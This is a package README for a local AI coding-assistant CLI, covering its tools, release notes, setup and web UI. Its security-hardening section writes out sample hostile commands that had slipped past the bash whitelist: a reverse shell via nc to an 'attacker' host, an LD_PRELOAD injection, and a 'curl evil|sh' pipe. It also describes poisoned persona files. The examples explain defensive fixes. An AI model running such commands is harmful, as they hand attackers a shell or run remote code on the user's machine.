@gh3ttoniga/my-ai

v0.11.1

Published

5 days ago

A free, local-first AI coding assistant CLI. Talks to Ollama by default and to Anthropic Claude when configured. Reads files, writes code, runs commands, and uses tools, like Claude Code in your terminal.


gh3ttoniga

ai cli claude coding-assistant anthropic ollama local-llm open-source free

my-ai

A free, local-first AI coding assistant CLI. Talks to Ollama by default (any model you have running), and to Anthropic Claude when configured. Reads files, writes code, runs commands, and uses tools — like Claude Code in your terminal.

Default = Ollama = free. Nothing on your machine ever leaves your network. You can switch to Anthropic Claude (paid) any time by editing .env.

What you get out of the box

Streaming chat UI with concurrent tool calls
22 tools: files (read_file, write_file, edit_file, delete_file, move_file), search (Glob, Grep, tree, list_dir), shell (bash + background bash_async/bash_output/bash_kill), web (WebFetch, web_search), dev (git, run_tests, read_lints, notebook_edit), agentic (spawn_agent, TodoWrite, ask_user), and self-extension (add_mcp_server)
Multimodal: @image.png / @doc.pdf / any file becomes a vision/text/extracted part the model can read
31 slash commands, incl. /undo, /map, /stats, /recall, /init, /review, /pr-comments, /rewind, /export, /memory, /context, /skill, /tree, /tree-conv, /mcp
Extensibility: custom slash commands + sub-agents (.my-ai/commands|agents/*.md), lifecycle hooks (.my-ai/hooks.json), skills (7 bundled, auto-activating), plugins (.my-ai/plugins/), and an MCP client with 15 curated presets (browser, git, fetch, db, search, memory, and media: ComfyUI/PiAPI video, ElevenLabs voice, Manim animation)
Self-extension: when asked for something it can't do, my-ai researches a vetted tool (GitHub/npm) and wires it (add_mcp_server) instead of refusing
Desktop app (my-ai serve web UI + Electron .exe shell), headless (my-ai -p "task" for CI/pipes), and an importable Agent SDK (createAgent().run())
Provider abstraction: local Ollama, Anthropic Claude (incl. claude-fable-5/claude-opus-4-8), or OpenRouter/MiniMax M3 — via .env
A layered safety model: bash whitelist, danger-tagged approval prompts, sandbox (MY_AI_SANDBOX_ROOT), user rules (.my-ai/rules.json), secret redaction, an audit log, and three permission profiles
A Claude-Code-style chip surface for parallel tool batches: status pills, conflict warnings, per-batch timing, and a per-turn cost row (see What you'll see)
762 unit tests (pure-logic, no I/O — npm test) plus end-to-end smokes
System prompt and tool-loop behavior inspired by Claude Code's publicly documented patterns — independently reimplemented here, not derived from upstream source

What's new in 0.11.0

The phase E1–E9 sweep toward full free-Claude-Code parity:

Media generation (MCP presets): comfyui (local image/video/audio/3D), piapi (cloud video/music/3D), elevenlabs (TTS/STT/voice), manim (animation video). /mcp add <name>.
Knowledge layer — skills: .my-ai/skills/*.md + 7 bundled (ui-ux, security, code-review, testing, performance, accessibility, api-design) that auto-activate on trigger keywords. /skill.
Extensibility: custom commands + sub-agents from files, lifecycle hooks, plugins (bundles of the above).
Background shells: bash_async / bash_output / bash_kill for dev servers, watchers, builds.
Headless + SDK: my-ai -p "task" (clean stdout, CI-ready) and createAgent().run().
Seven built-in commands: /init /review /pr-comments /rewind /export /memory /context.
Notebooks: notebook_edit for .ipynb cells. MCP resources: /mcp resources + /mcp read.
Self-extension: the agent acquires missing capabilities (research → add_mcp_server → relaunch).
Integrations: a GitHub Action headless runner (.github/workflows/my-ai.yml) and a VS Code extension scaffold (vscode-extension/).

What's new in 0.7.5

Five autonomy primitives wired into the existing CLI loop, all default-OFF (today's behavior is byte-identical without opt-in env). See also the Security hardening (0.7.5) section below for the three security fixes in this release, and the What you'll see section for the parallel-tool chip surface.

spawn_agent

Sub-agent delegation is now on the tool list (src/subagent.ts#SPAWN_AGENT_TOOL), with recursion bounded at 1. SUBAGENT_TOOLS strips spawn_agent from the child's tool surface, and runToolForSubAgent also rejects spawn_agent by name as defense in depth, so a future caller passing a wider tool set still cannot spawn recursively. The sub-agent's intermediate output never interleaves with the parent display (silent onText / onReasoning wrappers); only the final answer lands as the tool_result the parent model sees, plus a single dim ⹑ sub-agent: <N> turns, <M> tool(s) line on stderr. To activate, just ask the model to delegate a focused sub-task; no env var, no slash command.
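The two-layer recursion bound can be pictured roughly as follows. This is a minimal sketch, not the code in src/subagent.ts: the `Tool` type and the function names `subAgentTools` and `runToolForChild` are hypothetical, and only the tool name `spawn_agent` comes from the text above.

```typescript
// Hypothetical shapes for illustration; only "spawn_agent" is taken from the README.
type Tool = { name: string };

const SPAWN_AGENT = "spawn_agent";

// Layer 1: the child's tool list never contains spawn_agent.
function subAgentTools(parentTools: Tool[]): Tool[] {
  return parentTools.filter((tool) => tool.name !== SPAWN_AGENT);
}

// Layer 2: even if a caller hands the child a wider tool set,
// the runner refuses spawn_agent by name before dispatching.
function runToolForChild(name: string, run: (name: string) => string): string {
  if (name === SPAWN_AGENT) {
    return "Error: sub-agents cannot spawn further sub-agents";
  }
  return run(name);
}
```

Either layer alone would stop recursion today; keeping both means a later refactor of one does not silently reopen it.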

budget

Per-task token/turn budget guard (src/budget.ts). Set MY_AI_MAX_TOKENS=N (positive int) and/or MY_AI_MAX_TURNS=N (positive int) in .env to cap a single agent loop. Either unset = unlimited; both unset = byte-identical to pre-0.7.5 behavior. When tripped the loop emits ⛔ stopped: <reason> and drops the user prompt without history corruption. Pin: tests/budget.test.ts verifies the byte-identical default-OFF behavior.
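As an illustration of the default-OFF behavior, a budget guard along these lines would leave the loop untouched when neither variable is set. It is a sketch under assumptions: `readBudget`, `checkBudget`, and `parsePositiveInt` are hypothetical names, and treating malformed values as "unlimited" is a guess rather than documented behavior of src/budget.ts.

```typescript
type Env = Record<string, string | undefined>;

interface Budget {
  maxTokens: number | undefined; // undefined means unlimited
  maxTurns: number | undefined;
}

// Accept only positive integers. Anything else is treated as "unset" here,
// which is an assumption of this sketch.
function parsePositiveInt(raw: string | undefined): number | undefined {
  if (raw === undefined || !/^\d+$/.test(raw.trim())) return undefined;
  const n = Number(raw.trim());
  return n > 0 ? n : undefined;
}

function readBudget(env: Env): Budget {
  return {
    maxTokens: parsePositiveInt(env.MY_AI_MAX_TOKENS),
    maxTurns: parsePositiveInt(env.MY_AI_MAX_TURNS),
  };
}

// Returns a stop reason, or null when the loop may continue.
function checkBudget(budget: Budget, usedTokens: number, turns: number): string | null {
  if (budget.maxTokens !== undefined && usedTokens >= budget.maxTokens) {
    return `token budget ${budget.maxTokens} reached`;
  }
  if (budget.maxTurns !== undefined && turns >= budget.maxTurns) {
    return `turn budget ${budget.maxTurns} reached`;
  }
  return null;
}
```

Passing the environment in as an argument keeps the check pure, which matches the "pure-logic, no I/O" style of the unit tests described earlier.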

retry

Self-correction retry policy (src/retry.ts). Set MY_AI_AUTO_RETRY=1 (accepts 1 / true / yes / on) to enable. The model re-plans a failed tool call once with a synthetic correction injected as a tool_result-style message; escalate routes the model toward ask_user after the cap. MY_AI_MAX_RETRIES=N (default DEFAULT_MAX_ATTEMPTS = 2 = 1 original + 1 retry) bounds repeat storms. Pin: tests/retry.test.ts 6 fixtures cover accept / retry / escalate.
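The accept / retry / escalate decision can be sketched as a small pure function. The names `isTruthyFlag`, `maxAttemptsFromEnv`, and `retryDecision` are hypothetical, case-insensitive flag matching is an assumption, and so is reading MY_AI_MAX_RETRIES as the total number of attempts (the text above equates the default of 2 with one original call plus one retry).

```typescript
type Env = Record<string, string | undefined>;
type RetryDecision = "accept" | "retry" | "escalate";

const DEFAULT_MAX_ATTEMPTS = 2; // 1 original + 1 retry, per the README

// Accepts 1 / true / yes / on. Lower-casing first is an assumption of this sketch.
function isTruthyFlag(raw: string | undefined): boolean {
  return raw !== undefined && ["1", "true", "yes", "on"].includes(raw.trim().toLowerCase());
}

// Assumption: N counts total attempts, and bad input falls back to the default.
function maxAttemptsFromEnv(env: Env): number {
  const n = Number(env.MY_AI_MAX_RETRIES);
  return Number.isInteger(n) && n > 0 ? n : DEFAULT_MAX_ATTEMPTS;
}

// `attempt` is the 1-based number of the attempt that just finished.
function retryDecision(ok: boolean, attempt: number, maxAttempts: number): RetryDecision {
  if (ok) return "accept";
  return attempt < maxAttempts ? "retry" : "escalate";
}
```

With the default cap, a first failure yields "retry" and a second failure yields "escalate", which is where the model would be steered toward ask_user.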

certifier

Tier 2.0 model-mode certifier upgrade (src/certify-model.ts#certifyWithModel). Set MY_AI_CERTIFY=model (or /certify model mid-session) so the active provider re-judges each tool result. The heuristic verdict is replaced on the model's pass / warn, preserved on unknown (fail-safe - a flaky model call cannot downgrade a confident pass). Per-tool upgrade writes an audit row to .my-ai/audit.log so the model's reasoning is visible. Pin: tests/certify-model.test.ts 4 fixtures verify the unknown-fail-safe.
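The fail-safe rule reduces to a one-line merge. The sketch below uses a hypothetical `mergeVerdict` helper and plain strings for the heuristic verdict, since the README does not list the heuristic's possible values.

```typescript
// The model's answer as described above: a usable verdict or "unknown".
type ModelVerdict = "pass" | "warn" | "unknown";

// Replace the heuristic verdict only when the model gave a usable answer.
// "unknown" (for example after a flaky model call) preserves the heuristic,
// so a confident pass can never be downgraded by a failed re-judgement.
function mergeVerdict(heuristic: string, model: ModelVerdict): string {
  return model === "unknown" ? heuristic : model;
}
```

A caller that catches a thrown provider error could map it to "unknown" before calling the merge, which would give the same fail-safe outcome.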

sessions

Three new slash commands: /save [id] writes the in-memory messages[] to .my-ai/session-<safeId(id)>.json (default id "default"), /resume <id> splices it back over the in-memory messages, /sessions lists the saved set newest-updated first. Set MY_AI_AUTOSAVE=1 to autosave to a fixed session-autosave.json slot on every /exit AND SIGINT; default OFF preserves today's drop-on-exit semantics. Pin: tests/session.test.ts 5 fixtures cover round-trip + malformed input.

OpenRouter / MiniMax provider

The OpenAI-compatible dispatch in src/providers/ollama.ts already works against any OpenAI-compatible endpoint - set OPENAI_BASE_URL=https://openrouter.ai/api/v1 and OPENAI_API_KEY=<gateway-key>, leave PROVIDER=ollama. For MiniMax run a local proxy (e.g. llama.cpp --server) and point OPENAI_BASE_URL at it; the request/response shape already matches the OpenAI Chat Completions schema. No code changes; the path is documented and end-to-end-verified.

What's new in 0.8.0

The Tier 2.0 + autonomy night-run lands seven architectural commits (N1–N7) plus three smoke runners, two new modules, and 544 tests with 11 regression locks. The user-facing deltas:

certifyBatch is now async — the per-tool model-mode upgrade loop lives inside src/certify-batch.ts instead of being dispatched inline in src/cli.ts#agentTurn. Set MY_AI_CERTIFY=model to upgrade each heuristic verdict via a single-shot askOnce to the active provider; unknown from the model is fail-safe (preserves the heuristic, never downgrades a confident pass). Use the /certify model slash command to switch mid-session.
MCP servers wire from .my-ai/mcp.json at boot — define {"image":{"command":"npx","args":["-y","@modelcontextprotocol/server-canvas"]}} and the namespaced tools (mcp__image__generate etc.) register at startup. Per-server try/catch isolates failures; missing config silently no-ops. The CLI prints 🔌 mcp: <N> MCP server(s) · <K> native tool(s) registered under the boot banner so you can see the result.
move_file is a gated first-class tool — joins bash / delete_file / read_lints in the [y/N] gate under the default profile; refused under readonly. Works across devices (EXDEV copy-then-remove); creates destination parent dir.
/decompose <goal> instant plan tree — one model call returns a numbered plan; parsePlan + renderPlan print ○/▶/✓/✗ glyphs. Re-issue bare to reprint the active plan, or with no plan in memory for a (no plan in this session — /decompose <goal> first) line.
OpenRouter / MiniMax / DeepSeek reasoning shows in the thinkpad — provider-field reasoning (delta.reasoning, reasoning_content, reasoning_details[]) now flows through the 💭 stderr channel via src/think-reasoning.ts#extractReasoning. Inline-tag reasoning (Ollama, Anthropic with extended thinking) unchanged.
PROVIDER_PRESETS for first-run UX — four curated entries (openrouter / minimax / lm-studio / vllm) come with the package; formatPresetsList() renders them for /doctor --explain presets. Hosted vs local are distinguished via requiresApiKey.
MY_AI_AUTOCOMMIT opt-in auto-commit — after a write_file/edit_file under --no-approve / MY_AI_AUTO_APPROVE / paranoid-accepted, src/autocommit.ts runs git add -A && git commit -m <tool: preview>. Best-effort, never throws; routes through child_process.execFile (NEVER shell:true); sanitizes multi-line forges and caps the message at 200 chars.
Three E2E smoke runners — tools/certify-smoke.ts (certifier modes), tools/retry-smoke.ts (accept/retry/escalate), tools/session-smoke.ts (/save roundtrip). All run the real CLI in tmpdir against PROVIDER=mock + MY_AI_MOCK_SCRIPT — no Ollama / network required.
Pre-release gate + cut orchestrator — tools/pre-tag-check.sh (11 regression locks mirroring CI) and scripts/release-cut.sh (defaults dry-run; --apply performs the cut). Run npm run pretag then npm run release-cut -- --apply.
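To make the auto-commit sanitizing concrete, here is a rough sketch of how a single-line, length-capped commit message and shell-free argument lists might be built. `commitMessage` and `autocommitArgs` are hypothetical names, not the functions in src/autocommit.ts; the 200-character cap and the `<tool: preview>` shape come from the text above.

```typescript
const MAX_COMMIT_MESSAGE = 200;

// Collapse any line breaks and runs of whitespace so a crafted preview
// cannot smuggle extra lines into the commit message, then cap the length.
function commitMessage(tool: string, preview: string): string {
  const oneLine = `${tool}: ${preview}`.replace(/\s+/g, " ").trim();
  return oneLine.slice(0, MAX_COMMIT_MESSAGE);
}

// Argument vectors for two separate `git` invocations. Passing these arrays
// to child_process.execFile (never a shell string) means the message is
// never interpreted by a shell.
function autocommitArgs(message: string): string[][] {
  return [
    ["add", "-A"],
    ["commit", "-m", message],
  ];
}
```

Because the message travels as one array element, quotes or `$(...)` inside a preview stay literal text in the commit.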

What's new in 0.8.1

A quality + test-coverage patch closing the post-v0.8.0 BUGLIST-pass2 audit. No user-facing surface change — every command, flag, env var, and slash command behaves identically to 0.8.0. The release is a refactor + documentation + test-completeness honest-bump: 544 unit tests now pass, up from 477 at v0.8.0.

src/cli.ts table-driven dispatch + catalog dedup — the 14-arm if/else-if REPL slash-cascade collapses to a single Map-driven dispatch via the new src/dispatch.ts (slashCommands Map + 19-entry DEFAULT_COMMAND_METADATA catalog as the single source of truth for both dispatch and printHelp). Routing fix: /save [id] and /resume <id> are indexed as bare /save and /resume (since parseSlash splits on first whitespace), so a /save abc call routes correctly to the canonical cmd key. The new registerAllSlashCommands in src/cli.ts iterates the catalog and binds each entry to a handlersByCmd map of SlashHandler closures over module state — a missing-handler throws at module-load, so wiring drift fails fast rather than silently stub-falling.
Documentation completeness — docs/COMMANDS.md is now the canonical reference for all 19 commands (16 advertised + 3 hidden), with cmd / intent / response shape / when to use columns. Defensive-path test coverage on src/session.ts, src/doctor.ts, src/redact.ts (the M1+M2+M3 work).
Test coverage closed — 12 new fixtures in tests/certify-batch.test.ts pin the public surface of certifyBatch(calls, opts) ⇒ Promise<BatchCertification> (heuristic + N7 model-mode upgrade pass + 3 fail-safe paths + multi-call ordering). This was the last src/ file lacking unit-test coverage after H2 closed both providers. tests/commands.test.ts + tests/persona.test.ts close the L2 / L3 catalog-shape and DEFAULT_PERSONA uniqueness contracts with grep + structural-shape pins.
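The Map-driven dispatch and its fail-fast wiring might look roughly like this. The names parseSlash, SlashHandler, and handlersByCmd appear in the notes above, but the bodies here are an independent sketch, and `CommandMeta`, `registerAll`, and `dispatch` are hypothetical.

```typescript
type SlashHandler = (args: string) => string;

interface CommandMeta {
  cmd: string;   // bare key used for routing, e.g. "/save"
  usage: string; // help text, e.g. "/save [id]"
}

// Split on the first whitespace so "/save abc" routes to the bare "/save" key.
function parseSlash(line: string): { cmd: string; args: string } {
  const trimmed = line.trim();
  const i = trimmed.search(/\s/);
  if (i === -1) return { cmd: trimmed, args: "" };
  return { cmd: trimmed.slice(0, i), args: trimmed.slice(i + 1).trim() };
}

// Bind every catalog entry to a handler; a missing handler throws here,
// at registration time, instead of surfacing later as a silent no-op.
function registerAll(
  catalog: CommandMeta[],
  handlersByCmd: Record<string, SlashHandler | undefined>,
): Map<string, SlashHandler> {
  const commands = new Map<string, SlashHandler>();
  for (const meta of catalog) {
    const handler = handlersByCmd[meta.cmd];
    if (!handler) throw new Error(`missing handler for ${meta.cmd}`);
    commands.set(meta.cmd, handler);
  }
  return commands;
}

// Returns undefined for unknown commands so the caller can print help.
function dispatch(commands: Map<string, SlashHandler>, line: string): string | undefined {
  const { cmd, args } = parseSlash(line);
  const handler = commands.get(cmd);
  return handler ? handler(args) : undefined;
}
```

Keeping the catalog as the only list of commands means help output and routing cannot drift apart.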

Try it: npx @gh3ttoniga/my-ai@0.8.1. The Tier 1.4–1.9 chip layer, BUF-1–3 autonomy primitives, Tier 2 certifier, MCP wiring, and move_file gate behavior are unchanged from v0.8.0.

What's new in 0.7.4

Parallel-write collision — when two writes target the same path, a ⚠ colliding writes at indices i,j row warns you before they race.
Auto-serialize opt-in — set MY_AI_AUTO_SERIALIZE=1 to ship colliding writes in order; they apply sequentially with the last write winning.
Per-turn cost row — a 💸 ~N in / ~N out · N tok line after every turn; Anthropic reports exact, Ollama falls back to a chars/4 estimate.
Verbose uniformity — --verbose threads through every chip class: args, results, slowest tool, and an ↳ estimate (chars/4) vs. ↳ model-reported annotation.
Wider bash whitelist — opt pnpm, bun, deno, npx, etc. into the auto-approved pattern via MY_AI_SAFE_COMMANDS (no fork needed).
Broader error classification — timeouts and signal kills now register as errors, not as green-completed.
System-prompt denylist: two known leaked-prompt aggregator repositories are blocked as sources for the whole session.
/plan audit replay — see historical Tier 1.4 batch-level decisions (approved / revised / rejected / auto-approved) from .my-ai/audit.log.
/tokens slash command — per-role breakdown plus the active compaction budget and utilization percentage so you can see context-window pressure at a glance.
Hardened CI gate — every push runs typecheck + test + build + chip smoke on Node 20 + 22; merges to main are blocked on any failure.

Try it: npx @gh3ttoniga/my-ai@0.7.4 (both install paths are described below).

Security hardening (0.7.5)

Three adversarial gates closed in this release. None change the visible UX for normal usage — they tighten what the per-command bash whitelist auto-approves and what a poisoned persona file can drop. See docs/security-audit-0.7.x.md for the full L×I risk register and red-team-fixtures.md for the 20-entry fixture battery driving these tests.

Persona override cannot drop the denylist

A custom persona file — MY_AI_PERSONA env var or .my-ai/persona.md — replaces only the ## Persona and tone section of DEFAULT_PERSONA. The list of forbidden system-prompt aggregators (the two public repos holding leaked Claude Code 2.0 and Cursor 2.0 production prompts) is hardcoded into src/prompts.ts#DENIED_PATHS_SECTION and spliced into every buildSystemPrompt() output, independent of persona resolution. End-user behavior: a malicious persona loaded via MY_AI_PERSONA=./evil.md cannot instruct the model to read those repos. The denylist survives because the splice happens after the persona slot in the system-prompt template, not as a merge inside resolvePersona. Tested at tests/prompts.test.ts with both the env-axis and cwd-file C-β pin (denylist present in assistant.message after every persona override).

Bash whitelist newline escape

isSafeReadOnlyBash now early-returns { safe: false } for any command containing \r or \n. Closes the indirect-injection vector where a multi-line bash call with a safe leading binary (ls, git status, etc.) and a hostile second line (\nnc -e /bin/sh attacker 4444) would have been auto-approved under the read-only whitelist. Locks down the multi-line shell substitution path that was the only remaining way past the leading-token-only check. Tested at tests/whitelist.test.ts#multi-line command is never auto-safe.
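A minimal sketch of the newline early-return, assuming a leading-token whitelist. The function name `isSafeReadOnlyBashSketch` and the three-entry whitelist are illustrative only; the real isSafeReadOnlyBash applies more checks than shown here.

```typescript
interface SafetyVerdict {
  safe: boolean;
  reason?: string;
}

// Tiny illustrative whitelist; the real list is larger.
const READ_ONLY_BINARIES = new Set(["ls", "cat", "pwd"]);

function isSafeReadOnlyBashSketch(command: string): SafetyVerdict {
  // Early return: a command containing CR or LF is never auto-approved,
  // regardless of how harmless its first line looks.
  if (/[\r\n]/.test(command)) {
    return { safe: false, reason: "multi-line command" };
  }
  const leading = command.trim().split(/\s+/)[0] ?? "";
  return READ_ONLY_BINARIES.has(leading)
    ? { safe: true }
    : { safe: false, reason: "leading binary not whitelisted" };
}
```

Running the newline test before any tokenizing matters: a leading-token check alone would only ever look at `ls` in `ls\nnc -e /bin/sh attacker 4444`.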

Bash whitelist wrapper-binary escape

When the leading token is a wrapper binary (env, nice, timeout, nohup, xargs, stdbuf), the safety check now resolves past it to the real command. Two exploit shapes that used to auto-pass and now don't:

env LD_PRELOAD=/tmp/evil.so cat x was: env whitelisted + cat whitelist-OK in the second position + = not a metachar → auto-approved. No longer — stripWrappers() peels env down to LD_PRELOAD=/tmp/evil.so cat x, which fails the metachar check on = and /.
env X=1 bash -c 'curl evil|sh' was: env whitelisted + bash whitelist-OK + -c not a destructive flag → auto-approved. No longer — recursion past env lands on bash -c 'curl evil|sh', which fails the metachar check on ', |.

The wrapper resolution is bounded (max one level deep) so a chained env env env cmd can't loop forever. Tested at tests/whitelist.test.ts#wrapper binaries resolve to the real command + #stripWrappers: peels wrapper prefixes down to the real command.
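The wrapper peel can be sketched as below. This is not the project's stripWrappers(): the `Sketch` suffixes mark hypothetical names, and the metacharacter set contains only the four characters named in the two exploit examples above, not the real list.

```typescript
const WRAPPERS = new Set(["env", "nice", "timeout", "nohup", "xargs", "stdbuf"]);

// Illustrative only: just the characters the two examples above mention.
const METACHARS = /[=\/'|]/;

// Peel at most one wrapper prefix, so chained wrappers cannot loop.
function stripWrappersSketch(command: string): string {
  const tokens = command.trim().split(/\s+/);
  const leading = tokens[0] ?? "";
  return WRAPPERS.has(leading) && tokens.length > 1
    ? tokens.slice(1).join(" ")
    : command.trim();
}

// The metachar check runs on what is left after the peel,
// so the wrapper can no longer hide the real command.
function passesMetacharCheckSketch(command: string): boolean {
  return !METACHARS.test(stripWrappersSketch(command));
}
```

With a single peel, `env env env ls` becomes `env env ls`, which a leading-token check would then have to judge on its own terms.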

These three fixes fine-tune the default profile's auto-approval surface; under readonly / paranoid, or with MY_AI_AUTO_APPROVE unset, the gate still prompts as before. They mostly matter when you're running with --no-approve and trusting the session. The decision line under each prompt and the audit log (.my-ai/audit.log) are unchanged — every gated call still gets logged regardless.

Setup — Ollama path (FREE, recommended)

1. Install Ollama

Download from https://ollama.com/download and run the installer. Or on macOS / Linux:

curl -fsSL https://ollama.com/install.sh | sh

2. Pull a model

Tool calling is required. qwen2.5-coder:7b is a strong default. Pick one that fits your hardware:

# Lightweight (4–6 GB, runs on most laptops including CPU):
ollama pull qwen2.5-coder:3b
# or: ollama pull llama3.2:3b

# Default (8–10 GB, best balance — needs NVIDIA GPU for fast inference):
ollama pull qwen2.5-coder:7b

# Stronger (~20 GB, requires beefy GPU):
ollama pull qwen2.5-coder:32b

# Strongest (high-end GPU only):
ollama pull llama3.1:70b

Run it once to confirm it works:

ollama run qwen2.5-coder:7b "Write a Python function to compute factorial"

3. Configure my-ai

cp .env.example .env

.env defaults to PROVIDER=ollama. Uncomment + edit the lines for the model you pulled.

4. Run

npm install
npm run dev       # uses tsx, no compile step

You should see the my-ai banner, then a you › prompt.

Setup — Anthropic path (paid, opt-in)

If you'd rather use Claude over the API (highest capability):

In .env, set:

PROVIDER=anthropic
ANTHROPIC_API_KEY=sk-ant-...

npm run dev

Setup — MiniMax media (MCP integration, opt-in)

my-ai supports the Model Context Protocol (MCP) to plug in external tools. To enable MiniMax image + video + TTS:

pip install uvx
Inside the my-ai REPL, run /mcp add minimax
Edit .my-ai/mcp.json and fill your MINIMAX_API_KEY from the MiniMax platform dashboard. MINIMAX_API_HOST defaults to https://api.minimax.io (override only for self-hosted or regional shards).
/exit and relaunch — MCP wiring runs at boot. Expect under the banner:

   🔌 mcp: 1 MCP server(s) · 8 native tool(s) registered
       mcp:minimax (8 tools)

Plus a /mcp show row minimax (green).

Namespacing: two MCP servers can both expose generate_image; the CLI distinguishes them by server prefix (mcp__minimax__generate_image vs. mcp__flux__generate_image). Every mcp__* call goes through the standard [y/N] gate on every profile. Bypass with MY_AI_AUTO_APPROVE=1. See docs/mcp-media.md for the full setup steps (uvx install + API key + host override + troubleshooting + tool table).
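The `mcp__<server>__<tool>` naming can be illustrated with a pair of helpers. `mcpToolName` and `parseMcpToolName` are hypothetical names, and the parser assumes server names never contain a double underscore.

```typescript
const MCP_PREFIX = "mcp__";

// Build the namespaced name under which a server's tool is registered.
function mcpToolName(server: string, tool: string): string {
  return `${MCP_PREFIX}${server}__${tool}`;
}

// Split a namespaced name back into its parts, or return null for
// anything that is not an MCP tool name.
// Assumption: the server part contains no "__".
function parseMcpToolName(name: string): { server: string; tool: string } | null {
  if (!name.startsWith(MCP_PREFIX)) return null;
  const rest = name.slice(MCP_PREFIX.length);
  const sep = rest.indexOf("__");
  if (sep <= 0 || sep + 2 >= rest.length) return null;
  return { server: rest.slice(0, sep), tool: rest.slice(sep + 2) };
}
```

A gate that needs to treat every MCP call alike can then key on `parseMcpToolName(name) !== null` rather than on individual tool names.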

Usage

First-time

npm install
cp .env.example .env
# edit .env to choose PROVIDER + model

npm run dev           # fastest iteration
# or
npm run build && npm start   # production run

Install & run

End users on any machine can run the published CLI without cloning — pick one:

# Reproducible — pins to the tested 0.7.4 release line:
npx @gh3ttoniga/my-ai@0.7.4

# Track-the-latest global install — update with `npm i -g` again to bump:
npm i -g @gh3ttoniga/my-ai

The exec name is my-ai (mapped by package.json#bin to dist/cli.js). If you cloned the repo, the launcher in bin/run.sh (POSIX) / bin/run.ps1 (Windows) resolves the project root and prefers the compiled dist/cli.js so clone-developers get the same my-ai CLI surface:

npm install
npm run build
./bin/run.sh         # POSIX
./bin/run.ps1        # Windows

Web UI (`my-ai serve`)

A small HTTP server that drives the SAME agent loop the REPL uses — same provider dispatcher, same toolHandlers, same message envelope. Useful when you'd rather use a browser than the terminal, or when you'd like to expose the agent on a dashboard / piped through another service.

# Boot the web UI on the default port (8787, bound to 127.0.0.1)
my-ai serve

# Custom port + uploads directory
my-ai serve --port 3000 --uploads ./shared-uploads

# OS-assigned ephemeral port (handy in tests / multi-service dashboards)
my-ai serve --port 0

# LAN-share an existing model config without auto-launching a browser
my-ai serve --host 0.0.0.0 --no-open

The UI runs at http://127.0.0.1:<port>/ (the default browser opens on boot — best-effort, never throws — --no-open skips the spawn). It exposes a chat transcript with bubble-style messages (user / assistant / reasoning / uploaded-file pills), live SSE streaming (event: chunk per model delta + event: done with the final assistant text + event: error if the engine throws), an Upload button that POSTs to /api/upload (saved under ./uploads by default), and a GET /api/files list endpoint for the round-trip smoke. Routes:

GET / — static UI shell (no build pipeline; ui/index.html).
GET /health — {"ok": true, "host": "<addr>", "port": <n>} liveness probe (used by the UI's status badge + any external /doctor-style curl smoke).
GET /api/files — {"files": ["<name>", ...]} list of uploaded filenames (sorted, dotfiles filtered).
GET /api/files/<name> — downloads with the right Content-Type via safeFilename (404 if missing).
POST /api/upload?name=<fn> — raw body becomes the file under ./uploads/; returns {"file": "<safe>", "bytes": <N>}. Filenames are sanitized via safeFilename — separators stripped, leading dots stripped, illegal chars (:*?"<>|) replaced, length clamped to 200, "file" fallback for empty.
POST /api/chat — Server-Sent Events stream of one agent turn; send {message, files?} (single-message + optional file basename list — server is stateless, UI maintains history locally), receive event: chunk per onChunk call + event: done with the engine's return value + event: error if the engine throws.
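The filename rules listed for POST /api/upload can be sketched as one small function. This is not the project's safeFilename: the order of the steps and the `_` replacement character are assumptions, since the README names the rules but not those details.

```typescript
const MAX_FILENAME_LENGTH = 200;

function safeFilenameSketch(raw: string): string {
  const cleaned = raw
    .replace(/[\/\\]/g, "")     // strip path separators
    .replace(/^\.+/, "")        // strip leading dots (no dotfiles, no "..")
    .replace(/[:*?"<>|]/g, "_") // replace illegal chars ("_" is an assumption)
    .slice(0, MAX_FILENAME_LENGTH);
  // Fall back to a fixed name when nothing usable is left.
  return cleaned.length > 0 ? cleaned : "file";
}
```

Stripping separators before leading dots means a traversal attempt such as `../../etc/passwd` collapses to a flat name inside the uploads directory.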

The chat surface reuses the same client.chat() call the REPL uses via src/agent-engine.ts — a single-message async function adapter ((message, onChunk, files) => Promise<string>) that wraps the existing provider call. REUSE-DON'T-FORK: same provider dispatcher, same persona + denylist + project block, same {role, content} message envelope the REPL uses; no second agent path. Power features (Tier 1.4 plan gate + certifier + budget/cost cap + profile/danger/prompt gate + Tier-1.6 chip layer + slash commands) stay terminal-only — they're an interactive UX and don't translate to a streaming HTTP consumer. A future tier could lift a sub-set into a request-level policy, but the wire today is "send your message + files, get streamed text back".

In-chat commands

/help - list available commands
/clear - reset the conversation history
/todos - ask the model to print the current todo list
/doctor - diagnose provider + model setup (free-engine friendly)
/doctor --explain <check> - root cause + one-line fix for a failing check (server, model, key, tools)
/model [name] - show or switch the active provider at runtime (ollama, anthropic)
/profile [name] - show or switch the permission profile (default, readonly, paranoid); persists to .my-airc
/compact - force-summarize older turns now to free up context
/tokens - show estimated-token breakdown of the current conversation (per role + total) plus the active compaction budget and utilization percentage, so you can see how full the context is without leaving the chat. Reads MY_AI_COMPACTION_BUDGET (same var as the compactor) — malformed input falls back to the 8000-token default silently so a bad env var can never break the inspection.
/persona - show the active voice / push-back / style-defaults persona caption (resolved at boot from MY_AI_PERSONA file path or .my-ai/persona.md)
/persona reload - prints a note that the caption is captured at boot; reloading mid-session is a no-op (exit + re-launch to pick up an edited persona file)
/persona reset - show how to return to the built-in default persona (clear .my-ai/persona.md / unset MY_AI_PERSONA, then re-launch)
/plan - replay the Tier 1.4 batch-level plan-gate decisions recorded in .my-ai/audit.log (filters the plan-* audit lines: approved / revised / rejected / auto-approved). The gate's pure-logic decision (evalPlanGate / estimateBatchLineDelta / renderPlanCard) lives in src/plan.ts (~180 lines, no I/O); end-to-end exercised by tools/tier1.4-smoke.ts.
/tree [path] - print a compact directory tree rooted at path (defaults to cwd). Skips node_modules, .git, build/CI caches, and dotfiles by default; capped at depth 3 + 200 entries; unreadable dirs are silently skipped. Delegates to src/explore.ts#fsTree (also powers the tree model tool the parent + read-only sub-agents can call). Same ↳/truncation rules as the width-time tools/tier1.6-chip-smoke.ts family of fixtures.
/tree-conv - show this session's conversation as a git-style tree. The REPL persists each message as a JSON node under .my-ai/conversation/<id>/ (one file per message, each linking to its parent); /tree-conv reads them back and prints an indented outline with role glyphs and a branch point(s) footer (a node gains a second child when you rewind with /undo and continue). Best-effort — a write failure prints a dim warning and never breaks the turn. Delegates to src/conversation-tree.ts.
/mcp - list curated MCP presets; /mcp add <preset> wires one into .my-ai/mcp.json; /mcp show lists connected servers; /mcp resources / /mcp read <server> <uri> browse a server's resources
/skill [name] - list skills (.my-ai/skills/*.md + bundled), or activate one into the system prompt; skills also auto-activate on trigger keywords
